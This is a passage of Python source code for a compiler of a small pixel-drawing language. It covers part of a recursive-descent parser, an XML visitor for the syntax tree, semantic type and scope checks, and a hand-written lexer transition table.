self.tokenTable[self.current_token_index][0])\n return {'Integer': token}\n\n if self.tokenTable[self.current_token_index][0] == 'BooleanLiteral':\n token = self.tokenTable[self.current_token_index][1]\n self.current_token_index += 1\n #print('factor', self.tokenTable[self.current_token_index][0])\n return {'BooleanLiteral': token}\n\n if self.tokenTable[self.current_token_index][0] == 'ColourLiteral':\n var_name = self.tokenTable[self.current_token_index][1]\n self.current_token_index += 1\n #print('factor', self.tokenTable[self.current_token_index][0])\n return {'ColourLiteral': var_name}\n\n if self.tokenTable[self.current_token_index][0] == 'PadWidth':\n token = self.tokenTable[self.current_token_index][1]\n self.current_token_index += 1\n #print('factor', self.tokenTable[self.current_token_index][0])\n return {'PadWidth': token}\n\n if self.tokenTable[self.current_token_index][0] == 'PadHeight':\n token = self.tokenTable[self.current_token_index][1]\n self.current_token_index += 1\n #print('factor', self.tokenTable[self.current_token_index][0])\n return {'PadHeight': token}\n\n #PadRead\n if self.tokenTable[self.current_token_index][0] == 'PadRead':\n token = self.tokenTable[self.current_token_index][1]\n self.current_token_index += 1\n firstEx = self.parse_expr()\n\n if self.tokenTable[self.current_token_index][0] != 'Comma':\n self.error('Expected ,')\n self.current_token_index += 1\n\n secondEx = self.parse_expr()\n\n #print('factor', self.tokenTable[self.current_token_index][0])\n return {'PadRead': token, 'First expression': firstEx, 'Second Expression': secondEx}\n\n if self.tokenTable[self.current_token_index][0] == 'PadRandI':\n token = self.tokenTable[self.current_token_index][1]\n self.current_token_index += 1\n firstEx = self.parse_expr()\n\n #print('factor', self.tokenTable[self.current_token_index][0])\n return {'PadRandI': token, 'Expression': firstEx}\n\n if self.tokenTable[self.current_token_index][0] == 'Unary':\n token = self.tokenTable[self.current_token_index][1]\n self.current_token_index += 1\n firstEx = self.parse_expr()\n\n #print('factor', self.tokenTable[self.current_token_index][0])\n return {'Unary': token, 'Expression': firstEx}\n\n if self.tokenTable[self.current_token_index][0] == 'OpenPar':\n #token = self.tokenTable[self.current_token_index][1]\n self.current_token_index += 1\n exp = self.parse_expr()\n\n if self.tokenTable[self.current_token_index][0] != 'ClosePar':\n self.error('Expected )')\n self.current_token_index += 1\n\n #print('factor', self.tokenTable[self.current_token_index][0])\n return {'SubExpr': '( )', 'Expression': exp}\n\n self.error('Expected a Valid Expression')\n\n def parse_variable(self):\n var_name = self.tokenTable[self.current_token_index][1]\n self.current_token_index += 1\n\n if(self.tokenTable[self.current_token_index][1] == '='):\n self.current_token_index += 1\n #print('variable', self.tokenTable[self.current_token_index-2][1])\n # Parse the expression\n expr = self.parse_expr()\n self.current_token_index += 1\n #print('variable', self.tokenTable[self.current_token_index][0])\n info = {'Name': var_name, 'Expression': expr}\n return {'Variable': info}\n\n def parse_print(self):\n self.current_token_index += 1\n\n # Parse the expression\n expr = self.parse_expr()\n #print('print', self.tokenTable[self.current_token_index][0])\n self.current_token_index += 1\n info = {'Expression': expr}\n return {'PrintStat': info, }\n\n def parse_delay(self):\n self.current_token_index += 1\n\n # Parse the expression\n expr = self.parse_expr()\n #print('delay', self.tokenTable[self.current_token_index][0])\n self.current_token_index += 1\n info = {'Expression': expr}\n return {'DelayStat': info}\n\n def parse_return(self):\n self.current_token_index += 1\n\n # Parse the expression\n expr = self.parse_expr()\n #print('return', self.tokenTable[self.current_token_index][0])\n self.current_token_index += 1\n #print('return', self.tokenTable[self.current_token_index][0])\n info = {'Expression': expr}\n return {'ReturnStat': info}\n\n def parse_pixel(self):\n expTable = []\n token = self.tokenTable[self.current_token_index][1]\n self.current_token_index += 1\n\n if token == '__pixelr':\n expr = self.parse_expr()\n expTable.append(expr)\n for i in range(4):\n if self.tokenTable[self.current_token_index][0] != 'Comma':\n self.error('Expected a Valid Expression')\n self.current_token_index += 1\n expr = self.parse_expr()\n expTable.append(expr)\n\n\n if token == '__pixel':\n expr = self.parse_expr()\n expTable.append(expr)\n for i in range(2):\n if self.tokenTable[self.current_token_index][0] != 'Comma':\n self.error('Expected a Valid Expression')\n self.current_token_index += 1\n expr = self.parse_expr()\n expTable.append(expr)\n\n if self.tokenTable[self.current_token_index][0] != 'SemiCol':\n self.error('Invalid Number Of Expressions')\n #print('Pixel', self.tokenTable[self.current_token_index][0])\n self.current_token_index += 1\n info= {'Type:': token, 'Expressions': expTable}\n return {'Pixel_Statment': info }\n\n\n def parse_block(self):\n #print('BLOCK *-*-*-*--*-*-* BLOCK')\n self.current_token_index += 1\n statTable = []\n\n\n while(True):\n # print('*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-')\n # print(self.tokenTable[self.current_token_index][0])\n # print('*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-')\n #print(len(self.tokenTable))\n\n statement = self.parse_selector()\n #print(self.tokenTable[self.current_token_index][0])\n #print(self.current_token_index)\n statTable.append(statement)\n #print(statTable)\n\n\n\n #and self.current_token_index == len(self.tokenTable)\n if (self.tokenTable[self.current_token_index][0] == 'CloseBlock'):\n if (self.current_token_index == len(self.tokenTable) - 1):\n info = {'Statement': statTable}\n return {'Block': info}\n break\n\n\n\n\n\n self.current_token_index += 1\n info = {'Statement': statTable}\n\n return {'Block': info }\n\n def parse_while(self):\n self.current_token_index += 1\n\n # Parse the expression\n if self.tokenTable[self.current_token_index][0] != 'OpenPar':\n self.error('Invalid While loop')\n\n self.current_token_index += 1\n expr = self.parse_expr()\n\n if self.tokenTable[self.current_token_index][0] != 'ClosePar':\n self.error('Invalid While loop')\n\n #self.current_token_index += 1\n #print('->->->_')\n block = self.parse_block()\n\n\n\n #self.current_token_index += 1\n #self.current_token_index += 1\n\n #print('While', self.tokenTable[self.current_token_index][0])\n info = {'Expression': expr, 'Block': block}\n return {'While Stat': info}\n\n def parse_ifElse(self):\n self.current_token_index += 1\n\n # Parse the expression\n if self.tokenTable[self.current_token_index][0] != 'OpenPar':\n self.error('Invalid While loop')\n\n self.current_token_index += 1\n expr = self.parse_expr()\n\n if self.tokenTable[self.current_token_index][0] != 'ClosePar':\n self.error('Invalid While loop')\n\n self.current_token_index += 1\n block = self.parse_block()\n #self.current_token_index += 1\n\n\n if self.tokenTable[self.current_token_index][0] == 'ElseStat':\n #self.current_token_index += 1\n #print('IFELSE', self.tokenTable[self.current_token_index][0])\n eBlock = self.parse_block()\n #print('IF+*ELSE', self.tokenTable[self.current_token_index][0])\n #self.current_token_index += 1\n #eInfo = {eBlock}\n info = {'Expression': expr, 'Block': block, 'ELSE_Stat': eBlock}\n return {'IF_Stat': info}\n else:\n #print('IF', self.tokenTable[self.current_token_index][0])\n #self.current_token_index += 1\n info = {'Expression': expr, 'Block': block}\n return {'IF_Stat': info}\n\n def parse_for(self):\n self.current_token_index += 1\n\n # Parse the expression\n if self.tokenTable[self.current_token_index][0] != 'OpenPar':\n self.error('Invalid For loop')\n\n self.current_token_index += 1\n varDecl = ''\n\n if self.tokenTable[self.current_token_index][0] == 'VariableDecl':\n varDecl = self.parse_variable_decl()\n\n self.current_token_index -= 1\n\n\n if self.tokenTable[self.current_token_index][0] != 'SemiCol':\n self.error('Invalid For loop')\n\n self.current_token_index += 1\n\n expr = self.parse_expr()\n\n if self.tokenTable[self.current_token_index][0] != 'SemiCol':\n self.error('Invalid For loop')\n\n self.current_token_index += 1\n assignment = ''\n if self.tokenTable[self.current_token_index][0] == 'ExpVariable':\n assignment = self.parse_variable()\n self.current_token_index -= 1\n\n if self.tokenTable[self.current_token_index][0] != 'ClosePar':\n self.error('Invalid For loop')\n\n self.current_token_index += 1\n\n block = self.parse_block()\n\n info = {'Variable Decl' : varDecl, 'Expression': expr, 'Assignment': assignment, 'Block': block}\n return {'For Stat': info}\n\n\nclass XmlVisitor:\n def __init__(self, ast_dict):\n self.xml = ''\n self.indentation = 0\n self.ast_dict = ast_dict\n\n def visit(self, node):\n if isinstance(node, dict):\n for key, value in node.items():\n #print(key)\n #print(value)\n self.indent()\n self.xml += f\"<{key}>\"\n self.indentation += 1\n self.xml += '\\n'\n self.visit(value)\n self.indent()\n self.xml += f\"\"\n self.xml += '\\n'\n self.indentation -= 1\n elif isinstance(node, list):\n for item in node:\n self.visit(item)\n else:\n self.indent()\n self.xml += str(node)\n self.xml += '\\n'\n\n def indent(self):\n self.xml += ' ' * self.indentation\n\n def write_to_file(self, file_path):\n with open(file_path, 'w') as f:\n f.write(self.xml)\n\n def generate_xml(self):\n self.visit(self.ast_dict)\n return self.xml\n\n\nclass SemanticAnalysis:\n def __init__(self, ast):\n self.ast = ast\n self.symbolTable = [[],[]]\n self.newScope = False\n self.functionTable = []\n\n # to check for duplicate variable declaration\n self.variableDecl()\n\n def error(self, message):\n raise Exception(message)\n def addVariable(self, name, type, location):\n\n #global scope\n for i in self.symbolTable[0]:\n if i[0] == name:\n #already exist\n self.error('Variable ' + i[0] + ' already declared')\n\n if location == 0:\n self.symbolTable[0].append([name, type])\n\n if location == 1:\n if self.newScope == True:\n self.symbolTable[1].append([[name, type]])\n else:\n for i in self.symbolTable[1][-1]:\n if i[0] == name:\n # already exists\n self.error('Variable ' + i[0] + ' already declared')\n self.symbolTable[1][-1].append([name, type])\n\n def getType(self,name,scope):\n for i in self.symbolTable[0]:\n if i[0] == name:\n #already exist\n return i[1]\n if scope == 1:\n if len(self.symbolTable[1]) != 0:\n for i in self.symbolTable[1][-1]:\n if i[0] == name:\n return i[1]\n\n def searchVariable(self, name, scope):\n #global scope\n for i in self.symbolTable[0]:\n if i[0] == name:\n #already exist\n return True\n if scope == 1:\n if len(self.symbolTable[1]) != 0:\n for i in self.symbolTable[1][-1]:\n if i[0] == name:\n return True\n return False\n else:\n return False\n else:\n return False\n def statCheck(self, statement, scope):\n\n if 'Variable' in statement:\n var = statement['Variable']\n self.assignmentCheck(var, scope)\n\n if 'Variable_Decl' in statement:\n var_decl = statement['Variable_Decl']\n self.varDeclCheck(var_decl, scope)\n\n if 'While Stat' in statement:\n whileStat = statement['While Stat']\n self.whileStatCheck(whileStat, scope)\n\n if 'IF_Stat' in statement:\n ifStat = statement['IF_Stat']\n self.ifStatCheck(ifStat,scope)\n\n if 'For Stat' in statement:\n forStat = statement['For Stat']\n self.forStatCheck(forStat,scope)\n\n if 'PrintStat' in statement:\n printStat = statement['PrintStat']\n self.printReturnDelayStatCheck(printStat,scope)\n\n if 'ReturnStat' in statement:\n Stat = statement['ReturnStat']\n self.returnStatCheck(Stat, scope)\n\n\n if 'DelayStat' in statement:\n Stat = statement['DelayStat']\n self.printReturnDelayStatCheck(Stat, scope)\n\n if 'Pixel_Statment' in statement:\n Stat = statement['Pixel_Statment']\n self.pixelStatCheck(Stat, scope)\n\n def varDeclCheck(self, Stat, scope):\n find = False\n name = Stat['name']\n type = Stat['type']\n self.addVariable(name, type, scope)\n #print(name,type)\n exp = Stat['expr']\n array = self.flatten_dict(exp)\n for i in range(len(array)):\n #8print(array[i])\n if array[i] == 'ExpVariable':\n find = self.searchVariable(array[i+1], scope)\n #print(array[i+1],find)\n if find == False:\n self.error('Variable \"' + array[i+1] + '\" not declared')\n else:\n if self.getType(array[i + 1], scope) != type:\n self.error('Variable \"' + array[i + 1] + '\" do not match the type of ' + name)\n elif array[i] == 'BooleanLiteral':\n #print(type)\n if type != ' BOOL ':\n self.error('Variable \"' + name + '\" does not except boolean')\n elif array[i] == 'ColourLiteral':\n #print(type)\n if type != ' COLOUR ':\n self.error('Variable \"' + name + '\" does not except colour types')\n\n elif array[i] == 'PadWidth':\n if type != ' INT ':\n self.error('Variable \"' + name + '\" does not except int types')\n\n elif array[i] == 'PadHeight':\n if type != ' INT ':\n self.error('Variable \"' + name + '\" does not except int types')\n\n elif array[i] == 'PadRandI':\n if type != ' INT ':\n self.error('Variable \"' + name + '\" does not except int types')\n\n\n\n self.newScope = False\n\n def assignmentCheck(self, assigment, scope):\n #find = False\n name = assigment['Name']\n type = self.getType(name, scope)\n find = self.searchVariable(name, scope)\n if find == False:\n self.error('Variable \"' + name + '\" not declared')\n\n exp = assigment['Expression']\n array = self.flatten_dict(exp)\n for i in range(len(array)):\n if array[i] == 'ExpVariable':\n #print(array[i + 1])\n find = self.searchVariable(array[i+1], scope)\n if find == False:\n self.error('Variable \"' + array[i + 1] + '\" not declared')\n else:\n if self.getType(array[i + 1], scope) != type:\n self.error('Variable \"' + array[i + 1] + '\" do not match the type of ' + name)\n elif array[i] == 'BooleanLiteral':\n # print(type)\n if type != ' BOOL ':\n self.error('Variable \"' + name + '\" does not except boolean')\n elif array[i] == 'ColourLiteral':\n # print(type)\n if type != ' COLOUR ':\n self.error('Variable \"' + name + '\" does not except colour types')\n\n elif array[i] == 'PadWidth':\n if type != ' INT ':\n self.error('Variable \"' + name + '\" does not except int types')\n\n elif array[i] == 'PadHeight':\n if type != ' INT ':\n self.error('Variable \"' + name + '\" does not except int types')\n\n elif array[i] == 'PadRandI':\n if type != ' INT ':\n self.error('Variable \"' + name + '\" does not except int types')\n\n\n\n def flatten_dict(self, dictionary):\n flattened = []\n for key, value in dictionary.items():\n flattened.append(key)\n if isinstance(value, dict):\n flattened.extend(self.flatten_dict(value))\n else:\n flattened.append(value)\n return flattened\n\n def forStatCheck(self, forStat, scope):\n #print(forStat)\n if 'Variable Decl' in forStat:\n var_decl = forStat['Variable Decl']['Variable_Decl']\n self.varDeclCheck(var_decl, scope)\n if 'Expression' in forStat:\n exp = forStat['Expression']\n array = self.flatten_dict(exp)\n for i in range(len(array)):\n if array[i] == 'ExpVariable':\n find = self.searchVariable(array[i + 1], scope)\n # print(array[i+1],find)\n if find == False:\n self.error('Variable \"' + array[i + 1] + '\" not declared')\n if 'Assignment' in forStat:\n exp = forStat['Assignment']['Variable']\n self.assignmentCheck(exp, scope)\n\n stat = forStat['Block']['Block']['Statement']\n\n for statement in stat:\n self.statCheck(statement, scope)\n\n def ifStatCheck(self, ifStat, scope):\n exp = ifStat['Expression']\n array = self.flatten_dict(exp)\n for i in range(len(array)):\n if array[i] == 'ExpVariable':\n find = self.searchVariable(array[i + 1], scope)\n # print(array[i+1],find)\n if find == False:\n self.error('Variable \"' + array[i + 1] + '\" not declared')\n\n stat = ifStat['Block']['Block']['Statement']\n #print(ifStat)\n for statement in stat:\n self.statCheck(statement, scope)\n if(len(ifStat)==3):\n elseStat = ifStat['ELSE_Stat']['Block']['Statement']\n for statement in elseStat:\n self.statCheck(statement, scope)\n #print(elseStat)\n\n\n #print(block)\n\n def whileStatCheck(self, whileStat, scope):\n if 'Expression' in whileStat:\n exp = whileStat['Expression']\n array = self.flatten_dict(exp)\n for i in range(len(array)):\n if array[i] == 'ExpVariable':\n find = self.searchVariable(array[i + 1], scope)\n # print(array[i+1],find)\n if find == False:\n self.error('Variable \"' + array[i + 1] + '\" not declared')\n block = whileStat['Block']['Block']\n stat = block['Statement'][0]['Block']['Statement']\n for statement in stat:\n self.statCheck(statement, scope)\n\n def printReturnDelayStatCheck(self, printStat, scope):\n find = False\n exp = printStat['Expression']\n array = self.flatten_dict(exp)\n for i in range(len(array)):\n if array[i] == 'ExpVariable':\n find = self.searchVariable(array[i+1], scope)\n #print(array[i+1],find)\n if find == False:\n self.error('Variable \"' + array[i + 1] + '\" not declared')\n\n def returnStatCheck(self, returnStat, scope):\n find = False\n exp = returnStat['Expression']\n #print(exp)\n array = self.flatten_dict(exp)\n\n #print(array)\n for i in range(len(array)):\n variableType = ''\n if array[i] == 'ExpVariable':\n find = self.searchVariable(array[i+1], scope)\n #print(array[i+1],find)\n if find == False:\n self.error('Variable \"' + array[i + 1] + '\" not declared')\n else:\n variableType = self.getType(array[i+1], scope)\n elif array[i] == 'BooleanLiteral':\n variableType = ' BOOL '\n\n elif array[i] == 'Integer':\n variableType = ' INT '\n\n elif array[i] == 'ColourLiteral':\n variableType = ' COLOUR '\n\n elif array[i] == 'PadWidth':\n variableType = ' INT '\n\n elif array[i] == 'PadHeight':\n variableType = ' INT '\n\n elif array[i] == 'PadRandI':\n variableType = ' INT '\n\n #print(variableType, self.functionTable[-1][1])\n #print(variableType)\n if variableType != '':\n if variableType != self.functionTable[-1][1]:\n self.error('Wrong return type : \"' + array[i + 1] + '\" needs to be' + self.functionTable[-1][1])\n\n\n\n\n\n def pixelStatCheck(self, pixelStat, scope):\n find = False\n exp = pixelStat['Expressions']\n #print(exp)\n mainType = pixelStat['Type:']\n #print(mainType)\n if mainType == '__pixelr':\n length = 4\n else:\n length = 2\n for item in range(len(exp)):\n # print (exp[item])\n if item < length:\n if 'ExpVariable' in exp[item]:\n find = self.searchVariable(exp[item]['ExpVariable'], scope)\n # print(array[i+1],find)\n if find == False:\n self.error('Variable \"' + exp[item]['ExpVariable'] + '\" not declared')\n\n type = self.getType(exp[item]['ExpVariable'], scope)\n\n if type != ' INT ':\n self.error('the first four expressions are to be type int and the last one of type colour')\n\n\n elif 'Integer' not in exp[item]:\n self.error('Integer needed')\n else:\n if 'ExpVariable' in exp[item]:\n find = self.searchVariable(exp[item]['ExpVariable'], scope)\n # print(array[i+1],find)\n if find == False:\n self.error('Variable \"' + exp[item]['ExpVariable'] + '\" not declared')\n\n type = self.getType(exp[item]['ExpVariable'], scope)\n\n if type != ' COLOUR ':\n self.error('last one of type colour')\n\n\n elif 'ColourLiteral' not in exp[item]:\n self.error('last one of type colour')\n\n\n\n\n\n #main\n def variableDecl(self):\n #check for global variables\n for i in self.ast:\n\n for key, value in i.items():\n self.newScope = True\n if key == 'Function_Decl':\n hasReturn = False\n duplicate = False\n functionName = value['Function name']\n functionType = value['Return type']\n for x in self.functionTable:\n if x[0] == functionName and x[1] == functionType:\n duplicate = True\n if duplicate == True:\n self.error('Function \"' + functionName + '\" of type' + functionType + 'already exists.')\n else:\n self.functionTable.append([functionName,functionType])\n\n\n for i in value['params']:\n self.addVariable(i[0], i[1], 1)\n self.newScope = False\n #print(i)\n\n block = value['Block']['Block']\n statements = block['Statement']\n #print(statements[2])\n for statement in statements:\n if 'ReturnStat' in statement:\n hasReturn = True\n self.statCheck(statement, 1)\n\n if hasReturn == False:\n self.error('Function \"' + functionName + '\" needs to has a Return statement')\n else:\n self.statCheck({key: value}, 0)\n\n\n self.newScope = True\n print(self.symbolTable)\n\n\ntransition_table = {}\n\nletter = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\ndigit = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\nhex = ['A', 'B', 'C', 'D', 'E', 'F', 'a', 'b', 'c', 'd', 'e', 'f', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\nmultiplicativeOp = ['*', '/', 'and']\n\n# 〈Identifier 〉\nfor x in letter:\n if x == 'n':\n transition_table[(55, x)] = 9\n transition_table[(2, x)] = 9\n else:\n if x == 't':\n transition_table[(55, x)] = 46\n else:\n if x == 'f':\n transition_table[(55, x)] = 50\n else:\n transition_table[(55, x)] = 1\n #transition_table[(2, x)] = 1\n transition_table[(1, x)] = 1\n\n transition_table[(9, x)] = 1\n transition_table[(10, x)] = 1\n transition_table[(11, x)] = 1\n transition_table[(46, x)] = 1\n transition_table[(47, x)] = 1\n transition_table[(48, x)] = 1\n transition_table[(49, x)] = 1\n transition_table[(50, x)] = 1\n transition_table[(51, x)] = 1\n transition_table[(52, x)] = 1\n transition_table[(53, x)] = 1\n transition_table[(54, x)] = 1\n transition_table[(0, x)] = 60\n transition_table[(59, x)] = 60\n transition_table[(60, x)] = 60\n transition_table[(101, x)] = 102\n transition_table[(102, x)] = 102\n transition_table[(105, x)] = 60\n transition_table[(116, x)] = 60\n transition_table[(202, x)] = 60\n\n transition_table[(56, x)] = 60\n transition_table[(57, x)] = 60\n transition_table[(58, x)] = 60\n transition_table[(93, x)] = 60\n transition_table[(94, x)] = 60\n transition_table[(95, x)] = 60\n transition_table[(96, x)] = 60\n transition_table[(97, x)] = 60\n transition_table[(88, x)] = 60\n transition_table[(124, x)] = 60\n transition_table[(125, x)] = 60\n transition_table[(98, x)] = 60\n transition_table[(110, x)] = 60\n transition_table[(111, x)] = 60\n transition_table[(117, x)] = 60\n transition_table[(118, x)] = 60\n transition_table[(119, x)] = 60\n transition_table[(120, x)] = 60\n transition_table[(121, x)] = 60\n transition_table[(99, x)] = 60\n transition_table[(100, x)] = 60\n\n\nfor d in digit:\n transition_table[(1, d)] = 1\n transition_table[(9, d)] = 1\n transition_table[(10, d)] = 1\n transition_table[(55, d)] = 37\n transition_table[(37, d)] = 37\n transition_table[(38, d)] = 37\n transition_table[(46, d)] = 1\n transition_table[(47, d)] = 1\n transition_table[(48, d)] = 1\n transition_table[(49, d)] = 1\n transition_table[(50, d)] = 1\n transition_table[(51, d)] = 1\n transition_table[(52, d)] = 1\n transition_table[(53, d)] = 1\n transition_table[(54, d)] = 1\n transition_table[(60, d)] = 60\n transition_table[(102, d)] = 102\n transition_table[(2, d)] = 37\n\n transition_table[(56, d)] = 60\n transition_table[(57, d)] = 60\n transition_table[(58, d)] = 60\n transition_table[(93, d)] = 60\n transition_table[(94, d)] = 60\n transition_table[(95, d)] = 60\n transition_table[(96, d)] = 60\n transition_table[(97, d)] = 60\n transition_table[(88, d)] = 60\n transition_table[(124, d)] = 60\n transition_table[(125, d)] = 60\n transition_table[(98, d)] = 60\n transition_table[(110, d)] = 60\n transition_table[(111, d)] = 60\n transition_table[(117, d)] = 60\n transition_table[(118, d)] = 60\n transition_table[(119, d)] = 60\n transition_table[(120, d)] = 60\n transition_table[(121, d)] = 60\n transition_table[(99, d)] = 60\n transition_table[(100, d)] = 60\n\n\ntransition_table[(1, '_')] = 1\ntransition_table[(9, '_')] = 1\ntransition_table[(10, '_')] = 1\ntransition_table[(46, '_')] = 1\ntransition_table[(47, '_')] = 1\ntransition_table[(48, '_')] = 1\ntransition_table[(49, '_')] = 1\ntransition_table[(50, '_')] = 1\ntransition_table[(51, '_')] = 1\ntransition_table[(52, '_')] = 1\ntransition_table[(53, '_')] = 1\ntransition_table[(54, '_')] = 1\ntransition_table[(60, '_')] = 60\ntransition_table[(102, '_')] = 102\n\ntransition_table[(56, '_')] = 60\ntransition_table[(57, '_')] = 60\ntransition_table[(58, '_')] = 60\ntransition_table[(93, '_')] = 60\ntransition_table[(94, '_')] = 60\ntransition_table[(95, '_')] = 60\ntransition_table[(96, '_')] = 60\ntransition_table[(97, '_')] = 60\ntransition_table[(88, '_')] = 60\ntransition_table[(124, '_')] = 60\ntransition_table[(125, '_')] = 60\ntransition_table[(98, '_')] = 60\ntransition_table[(110, '_')] = 60\ntransition_table[(111, '_')] = 60\ntransition_table[(117, '_')] = 60\ntransition_table[(118, '_')] = 60\ntransition_table[(119, '_')] = 60\ntransition_table[(120, '_')] = 60\ntransition_table[(121, '_')] = 60\ntransition_table[(99, '_')] = 60\ntransition_table[(100, '_')] = 60\n\n#spacer\ntransition_table[(1, ' ')] = 3\n#transition_table[(2, ' ')] = 2\ntransition_table[(2, ' ')] = 55\ntransition_table[(8, ' ')] = 2\ntransition_table[(9, ' ')] = 3\ntransition_table[(10, ' ')] = 3\ntransition_table[(12, ' ')] = 55\ntransition_table[(19, ' ')] = 3\ntransition_table[(25, ' ')] = 3\ntransition_table[(30, ' ')] = 55\ntransition_table[(140, ' ')] = 55\ntransition_table[(34, ' ')] = 55\ntransition_table[(35, ' ')] = 55\ntransition_table[(37, ' ')] = 3\ntransition_table[(45, ' ')] = 3\ntransition_table[(58, ' ')] = 59\ntransition_table[(60, ' ')] = 61\ntransition_table[(62, ' ')] = 55\ntransition_table[(63, ' ')] = 64\ntransition_table[(69, ' ')] = 80\ntransition_table[(81, ' ')] = 55\ntransition_table[(88, ' ')] = 55\ntransition_table[(100, ' ')] = 101\ntransition_table[(103, ' ')] = 59\ntransition_table[(104, ' ')] = 105\ntransition_table[(106, ' ')] = 107\ntransition_table[(109, ' ')] = 64\ntransition_table[(111, ' ')] = 112\ntransition_table[(113, ' ')] = 114\ntransition_table[(31, ' ')] = 55\ntransition_table[(115, ' ')] = 55\ntransition_table[(31, ' ')] = 55\ntransition_table[(36, ' ')] = 3\ntransition_table[(117, ' ')] = 200\n#transition_table[(37, ' ')] = 1\ntransition_table[(8, ' ')] = 55\ntransition_table[(7, ' ')] = 55\ntransition_table[(121, ' ')] = 122\ntransition_table[(123, ' ')] = 55\ntransition_table[(0, ' ')] = 0\n\n\n#transition_table[(36, '}')] = 200\n\n\n\n\n#〈MultiplicativeOp〉\ntransition_table[(3, '*')] = 2\ntransition_table[(3, '/')] = 2\ntransition_table[(3, 'a')] = 4\ntransition_table[(4, 'n')] = 5\ntransition_table[(5, 'd')] = 2\n\n#〈AdditiveOp〉 ::= ‘+’ | ‘-’ | ‘or’\ntransition_table[(3, '+')] = 2\ntransition_table[(3, '-')] = 2\ntransition_table[(3, 'o')] = 6\ntransition_table[(6, 'r')] = 2\n\n#〈RelationalOp〉 ::= ‘<’ | ‘>’ | ‘==’ | ‘!=’ | ‘<=’ | ‘>=’\ntransition_table[(3, '=')] = 7\ntransition_table[(3, '!')] = 7\ntransition_table[(7, '=')] = 2\ntransition_table[(3, '<')] = 8\ntransition_table[(3, '>')] = 8\ntransition_table[(8, '=')] = 2\n\n#〈Unary〉\ntransition_table[(9, 'o')] = 10\ntransition_table[(10, 't')] = 12\ntransition_table[(55, '-')] = 11\ntransition_table[(2, '-')] = 11\n\n#〈PadWidth〉 :: = ‘__width’\ntransition_table[(55, '_')] = 13\ntransition_table[(13, '_')] = 14\ntransition_table[(2, '_')] = 13\ntransition_table[(14, 'w')] = 15\ntransition_table[(15, 'i')] = 16\ntransition_table[(16, 'd')] = 17\ntransition_table[(17, 't')] = 18\ntransition_table[(18, 'h')] = 19\n\n\n#〈PadHeight〉 :: = ‘__height’\ntransition_table[(14, 'h')] = 20\ntransition_table[(20, 'e')] = 21\ntransition_table[(21, 'i')] = 22\ntransition_table[(22, 'g')] = 23\ntransition_table[(23, 'h')] = 24\ntransition_table[(24, 't')] = 25\n\n#〈PadRandI〉 :: = ‘__randi’ 〈Expr 〉\ntransition_table[(14, 'r')] = 26\ntransition_table[(26, 'a')] = 27\ntransition_table[(27, 'n')] = 28\ntransition_table[(28, 'd')] = 29\ntransition_table[(29, 'i')] = 30\n\n#〈PadRead〉 :: = ‘__read’ 〈Expr 〉‘,’〈Expr 〉\ntransition_table[(26, 'e')] = 32\ntransition_table[(32, 'a')] = 33\ntransition_table[(33, 'd')] = 140\ntransition_table[(3, ',')] = 34\n\n#〈FunctionCall〉 ::= 〈Identifier 〉 ‘(’ [ 〈ActualParams〉 ] ‘)’\ntransition_table[(3, '(')] = 35\ntransition_table[(35, ')')] = 36\ntransition_table[(3, ')')] = 36\n\n# ’ 〈Type〉 〈Block〉\ntransition_table[(0, 'f')] = 98\ntransition_table[(98, 'u')] = 99\ntransition_table[(99, 'n')] = 100\ntransition_table[(102, '(')] = 103\ntransition_table[(80, ',')] = 104\ntransition_table[(80, ')')] = 106\ntransition_table[(103, ')')] = 106\ntransition_table[(107, '-')] = 108\ntransition_table[(108, '>')] = 109\ntransition_table[(80, '{')] = 201\n\n#〈ForStatement〉 ::= ‘for’ ‘(’ [ 〈VariableDecl〉 ] ’;’ 〈Expr 〉 ’;’ [ 〈Assignment〉 ] ‘)’ 〈Block〉\ntransition_table[(98, 'o')] = 110\ntransition_table[(110, 'r')] = 111\ntransition_table[(112, '(')] = 113\ntransition_table[(113, ';')] = 115\ntransition_table[(114, 'l')] = 56\ntransition_table[(116, ')')] = 117\ntransition_table[(1, ')')] = 36\ntransition_table[(55, ')')] = 36\n\n#〈WhileStatement〉 ::= ‘while’ ‘(’ 〈Expr 〉 ‘)’ 〈Block〉\ntransition_table[(0, 'w')] = 117\ntransition_table[(117, 'h')] = 118\ntransition_table[(118, 'i')] = 119\ntransition_table[(119, 'l')] = 120\ntransition_table[(120, 'e')] = 121\ntransition_table[(122, '(')] = 123\n\n#〈IfStatement〉 ::= ‘if’ ‘(’ 〈Expr 〉 ‘)’ 〈Block〉 [ ‘else’ 〈Block〉 ]\n\ntransition_table[(0, 'i')] = 124\ntransition_table[(124, 'f')] = 125\ntransition_table[(125, ' ')] = 126\ntransition_table[(126, '(')] = 127\ntransition_table[(127, ' ')] = 55\ntransition_table[(128, 'e')] = 129\ntransition_table[(129, 'l')] = 130\ntransition_table[(130, 's')] = 131\ntransition_table[(131, 'e')] = 132\ntransition_table[(132, ' ')] = 200\ntransition_table[(200, '{')] = 201\n\n# 〈PixelStatement〉 ::= ‘__pixelr’ 〈Expr 〉‘,’〈Expr 〉‘,’〈Expr 〉‘,’〈Expr 〉‘,’〈Expr 〉\n# | ‘__pixel’ 〈Expr 〉‘,’〈Expr 〉‘,’〈Expr 〉\n\ntransition_table[(84, 'i')] = 133\ntransition_table[(133, 'x')] = 134\ntransition_table[(134, 'e')] = 135\ntransition_table[(135, 'l')] = 136\ntransition_table[(136, ' ')] = 55\ntransition_table[(136, 'r')] = 137\ntransition_table[(137, ' ')] = 55\ntransition_table[(3, ',')] = 138\ntransition_table[(138, ' ')] = 55\n\n\n#〈Block〉 ::= ‘{’ { 〈Statement〉 } ‘}’\ntransition_table[(0, '{')] = 201\ntransition_table[(36, '{')] = 201\ntransition_table[(201, ' ')] = 202\ntransition_table[(202, 'l')] = 56 #\ntransition_table[(202, '_')] = 82 # \ntransition_table[(202, 'r')] = 93 # \ntransition_table[(202, 'i')] = 124 #\ntransition_table[(202, 'f')] = 98 # \ntransition_table[(202, 'w')] = 117 #\ntransition_table[(202, '{')] = 201 